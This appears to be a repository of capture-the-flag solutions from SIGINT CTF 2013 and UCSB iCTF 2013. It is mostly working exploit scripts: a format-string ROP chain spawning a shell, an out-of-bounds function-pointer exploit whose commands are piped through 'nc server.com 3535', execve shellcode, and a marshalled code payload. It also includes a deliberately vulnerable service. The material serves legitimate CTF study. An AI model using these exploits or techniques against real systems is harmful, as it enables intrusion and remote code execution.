├── SIGINTCTF2013
    ├── crash
    │   ├── handler.sh
    │   ├── crash
    │   ├── README
    │   └── exploit.py
    ├── tr0llsex
    │   ├── server
    │   ├── README
    │   └── exploit.py
    └── baremetal
    │   └── payload.py
├── README.md
└── UCSB iCTF 2013
    └── Water
        ├── MeasurementLib.py
        ├── WaterExploit.py
        └── WaterSystemServer.py


/SIGINTCTF2013/crash/handler.sh:
--------------------------------------------------------------------------------
1 | socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./crash


--------------------------------------------------------------------------------
/SIGINTCTF2013/crash/crash:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/7h3rAm/CTF-Solutions/master/SIGINTCTF2013/crash/crash


--------------------------------------------------------------------------------
/SIGINTCTF2013/tr0llsex/server:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/7h3rAm/CTF-Solutions/master/SIGINTCTF2013/tr0llsex/server


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | CTF-Solutions
2 | =============
3 | 
4 | Solutions to a variety of Capture The Flag challenges from different competitions.
5 | 


--------------------------------------------------------------------------------
/SIGINTCTF2013/tr0llsex/README:
--------------------------------------------------------------------------------
1 | This exploit leverages an out of bounds array lookup into function pointers
2 | to divert control from the application. The exploit leverages some dead code,
3 | a "debug_handler" for an information leak and then executes arbitrary commands
4 | with system() from libc.


--------------------------------------------------------------------------------
/SIGINTCTF2013/crash/README:
--------------------------------------------------------------------------------
1 | This exploit leverages an uncontrolled format string vulnerability to create
2 | a read anything anywhere and a write anything anywhere condition. The 
3 | exploit leverages these conditions to leak a stack address and write a ROP
4 | chain to unused stack memory. The exploit then corrupts a saved base pointer
5 | on the stack to ensure the execution of the ROP payload eventually spawning
6 | a shell. 


--------------------------------------------------------------------------------
/UCSB iCTF 2013/Water/MeasurementLib.py:
--------------------------------------------------------------------------------
 1 | import math
 2 | 
 3 | def calculate(sequence):
 4 |   m = []
 5 |   for i in range(1,10):
 6 |     m.append(math.log10(1+1.0/i))
 7 | 
 8 |   nums = [x[0] for x in sequence.split(",")]
 9 | 
10 |   o = {}
11 | 
12 |   for num in nums:
13 |     if num in o:
14 |       o[num] += 1
15 |     else:
16 |       o[num] = 1
17 |   
18 |   if len(o) != 9: return False
19 | 
20 |   else:
21 |     for d in sorted(o):
22 |       if not (float(o[d]) / sum([int(x) for x in o.values()]) >= m[int(d)-1] - 0.05 and float(o[d]) / sum([int(x) for x in o.values()]) <= m[int(d)-1] + 0.05):
23 | 	return False
24 |   return True
25 | 


--------------------------------------------------------------------------------
/SIGINTCTF2013/baremetal/payload.py:
--------------------------------------------------------------------------------
 1 | last_byte = '\x97' # xchg eax, edi
 2 | req_len = 0x3d
 3 | req_sum = 0x1ee7-557 #The 557 accounts for data after the buffer
 4 | 
 5 | shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80'
 6 | assert(len(shellcode) < req_len - 2)
 7 | def strsum(string):
 8 |     sum = 0
 9 |     for i in string:
10 |         sum += ord(i)
11 |     return sum
12 | buf = "X" + shellcode
13 | current_length = len(buf + last_byte)
14 | current_sum = strsum(buf + last_byte)
15 | left_len = req_len - current_length
16 | left_sum = req_sum - current_sum
17 | for i in range(left_len - 1):
18 |     buf += chr(left_sum/left_len)
19 | buf += chr(req_sum - strsum(buf + last_byte)) + last_byte
20 | assert(len(buf) == req_len)
21 | assert(strsum(buf) == req_sum)
22 | assert('\0' not in buf)
23 | print buf


--------------------------------------------------------------------------------
/SIGINTCTF2013/tr0llsex/exploit.py:
--------------------------------------------------------------------------------
 1 | #Evan Jensen (wont)
 2 | #07072013
 3 | 
 4 | import sctp
 5 | from time import sleep
 6 | from isis import *
 7 | chal=('localhost',2323)
 8 | 
 9 | listener='server.com 3535'
10 | def send_msg(msg,chan):
11 | 	sk=sctp.sctpsocket_tcp(socket.AF_INET)
12 | 	sk.settimeout(2)
13 | 	sk.connect(chal)
14 | 	sk.sctp_send(msg,stream=chan)
15 | 	print sk.recv(0x10000)
16 | 	return sk
17 | 
18 | def pad(s,l):
19 | 	return s+'\0'*(l-len(s))
20 | 
21 | 
22 | debuga=0x401120
23 | debug=pack("Q",debuga)
24 | 
25 | def e():
26 | 	print "[*]Getting System"
27 | 	s=send_msg(pad('system',8*3)+debug+ 'A'*(0x800-8*4-1)+'\0' ,9)
28 | 	time.sleep(1)
29 | 	addr=s.recv(0x1000)
30 | 	print "[*]System: %s"%addr
31 | 	system=pack("Q",int(addr,16))
32 | 	while True:
33 | 		command=raw_input('$')
34 | 		command=command+'|nc '+listener
35 | 		print "Command len %d"%len(command)
36 | 		send_msg(pad(command,8*3)+system+'A'*(0x800-8*4-1)+'\0' ,9)
37 | 		
38 | e()
39 | 
40 | 
41 | 
42 | 
43 | 


--------------------------------------------------------------------------------
/UCSB iCTF 2013/Water/WaterExploit.py:
--------------------------------------------------------------------------------
 1 | #####################################################
 2 | 
 3 | # -*- coding: utf-8 -*-
 4 | 
 5 | 
 6 | class Exploit(object):
 7 | 
 8 |     def callback(self):
 9 |         clientsock.send(str(flag) + "\n")
10 | 
11 |     def execute(self, ip, port, flag_id):
12 |         
13 |         ## Exploit specific imports
14 |         import re, base64, marshal, random, socket
15 |         
16 |         ## Set up socket to water service
17 |         s = socket.socket()
18 |         s.connect((ip, port))
19 |         s.settimeout(3)
20 | 
21 |         ## Generate measurements
22 |         count = [4, 2, 1, 1, 1, 1, 1, 1, 1]
23 |         inp = []
24 |         for x in range(1,10):
25 |                 for y in range(count[x-1]):
26 |                         tmp = str(x) + str(random.randint(1,100000))
27 |                         inp.append(tmp)
28 |         measurements = ','.join(inp)
29 | 
30 |         ## Send measurements
31 |         s.send(str(measurements)+"\n")
32 |         s.recv(1024)
33 |         
34 |         ## Generate payload
35 |         payload = base64.b64encode(marshal.dumps(self.callback.func_code))
36 |         
37 |         ## Send payload
38 |         s.send(payload + "\n")
39 | 
40 |         ## Recover the flag
41 |         flag = s.recv(1024).rstrip()
42 |         flag = re.compile('(FLG\w+)').search(flag).groups(1)[0]
43 |         self.flag = flag.rstrip()
44 | 
45 |     def result(self):
46 |         return {'FLAG' : self.flag }
47 |         
48 | #########################################################


--------------------------------------------------------------------------------
/UCSB iCTF 2013/Water/WaterSystemServer.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from socket import *
 4 | from MeasurementLib import *
 5 | import base64
 6 | import marshal
 7 | import thread
 8 | import types
 9 | 
10 | flag = None  
11 | cookie = None
12 | flag_id = None
13 | 
14 | measurements = set([])
15 | 
16 | def connection_handler(clientsock,addr):
17 |   try:
18 |     clientsock.send("Welcome back. Please insert your measurement\n:")
19 |     data = clientsock.recv(BUFSIZ)
20 |     if not data: return
21 |     r = calculate(data)
22 |     if not r:
23 |       ## Original code
24 |       # if int(data.split(',')[-1]) == flag_id:
25 |       #  clientsock.send("%s\n"%flag)
26 |       # clientsock.close()
27 |       ##
28 |       ## Prevent backdoor to flag
29 |       if int(data.split(',')[-1]) == flag_id:
30 |         clientsock.close()
31 |       ##
32 |     else:  
33 |       if data in measurements:
34 |           clientsock.send("Thanks, but we have already seen this measurement\n")
35 |           clientsock.close()
36 |       else:
37 |         measurements.add(data)
38 |         clientsock.send("Floods ahead! Please enter your command\n:")
39 |         data = clientsock.recv(BUFSIZ)  
40 |         ## Prevent execution of user code by checking for expected function name     
41 |         if "callback" in base64.b64decode(data):
42 |           clientsock.close()
43 |         ##
44 |         types.FunctionType(marshal.loads(base64.b64decode(data)), globals(), "callback")(clientsock)
45 |         clientsock.close()
46 |   except Exception as e: print e
47 |   return
48 | 
49 | if __name__ == "__main__":
50 |   
51 |   HOST = "0.0.0.0"
52 |   PORT = 3333
53 |   BUFSIZ = 1024
54 |   ADDR = (HOST, PORT)
55 |   serversock = socket(AF_INET, SOCK_STREAM)
56 |   serversock.bind(ADDR)
57 |   serversock.listen(2)
58 | 
59 |   while True:
60 |     clientsock, addr = serversock.accept()
61 |     thread.start_new_thread(connection_handler, (clientsock, addr))
62 |   serversock.close()  
63 | 


--------------------------------------------------------------------------------
/SIGINTCTF2013/crash/exploit.py:
--------------------------------------------------------------------------------
 1 | #Evan Jensen (wont)
 2 | #07072013
 3 | 
 4 | 
 5 | from isis import *
 6 | from struct import pack
 7 | from time import sleep
 8 | chal=('localhost',2323)
 9 | s=getSocket(chal)
10 | 
11 | 
12 | p=''
13 | p += pack("<I", 0x080a71ba) # pop edx ; ret
14 | p += pack("<I", 0x08138080) # @ .data
15 | p += pack("<I", 0x0806d113) # pop eax ; ret
16 | p += "/bin" # /bin
17 | p += pack("<I", 0x080d762d) # mov DWORD PTR [edx],eax ; ret
18 | p += pack("<I", 0x080a71ba) # pop edx ; ret
19 | p += pack("<I", 0x08138084) # @ .data + 4
20 | p += pack("<I", 0x0806d113) # pop eax ; ret
21 | p += "//sh" # //sh
22 | p += pack("<I", 0x080d762d) # mov DWORD PTR [edx],eax ; ret
23 | p += pack("<I", 0x080a71ba) # pop edx ; ret
24 | p += pack("<I", 0x08138088) # @ .data + 8
25 | p += pack("<I", 0x08048c93) # xor eax,eax ; ret
26 | p += pack("<I", 0x080d762d) # mov DWORD PTR [edx],eax ; ret
27 | p += pack("<I", 0x08048211) # pop ebx ; ret
28 | p += pack("<I", 0x08138080) # @ .data
29 | p += pack("<I", 0x08126ad1) # pop ecx ; ret
30 | p += pack("<I", 0x08138088) # @ .data + 8
31 | p += pack("<I", 0x080a71ba) # pop edx ; ret
32 | p += pack("<I", 0x08138088) # @ .data + 8
33 | p += pack("<I", 0x08048c93) # xor eax,eax ; ret
34 | p += pack("<I", 0x0805aceb) # inc eax ; ret
35 | p += pack("<I", 0x0805aceb) # inc eax ; ret
36 | p += pack("<I", 0x0805aceb) # inc eax ; ret
37 | p += pack("<I", 0x0805aceb) # inc eax ; ret
38 | p += pack("<I", 0x0805aceb) # inc eax ; ret
39 | p += pack("<I", 0x0805aceb) # inc eax ; ret
40 | p += pack("<I", 0x0805aceb) # inc eax ; ret
41 | p += pack("<I", 0x0805aceb) # inc eax ; ret
42 | p += pack("<I", 0x0805aceb) # inc eax ; ret
43 | p += pack("<I", 0x0805aceb) # inc eax ; ret
44 | p += pack("<I", 0x0805aceb) # inc eax ; ret
45 | p += pack("<I", 0x0806cead) # int 0x80
46 | 
47 | halfs=[unpack("<H",i)[0] for i in chunk(p,2)]
48 | 
49 | def printfWrite(halfs,starting):
50 | 	ret=''
51 | 	starting=hex(starting)[2:].replace('L','')
52 | 	for i in halfs:
53 | 		ret+='dec %s\n'% starting
54 | 		ret+='echo %'+str(i).zfill(5)+'x%25$hn\n'
55 | 		starting=hex(int(starting,16)+2)[2:].replace('L','')
56 | 	return ret
57 | 
58 | 
59 | def e():		
60 | 	junk=s.recv(0x1000)
61 | 	s.send('echo %6$x\n')
62 | 	sleep(.2)
63 | 	addr=s.recv(0x1000).splitlines()[1]
64 | 	addr=int(addr,16)&0xffff0000 #begining of page
65 | 	print "[*]write to %s" % hex(addr+4)
66 | 	corruption=printfWrite(halfs,addr+4).splitlines()
67 | 	for i in corruption:
68 | 		s.send(i+'\n')
69 | 		if 'dec' in i:
70 | 			print '[*]writing %s' % i.split(' ')[1]
71 | 		time.sleep(.2)
72 | 		junk=s.recv(0x100000)
73 | 	sleep(1)
74 | 	#stomp on old ebp. Just the lower two bytes
75 | 	#This will let ESP eventually take the address of our rop chain
76 | 	s.send("echo %6$hn\n")
77 | 	print "[*]rop"
78 | 	s.send('quit\n') #unwind that stack you dirty tramp
79 | 	print "[*]clean"
80 | 	sleep(1)
81 | 	junk=s.recv(0x1000)
82 | 	print "[*]shell"
83 | 	shell(s)
84 | 
85 | e()
86 | 


--------------------------------------------------------------------------------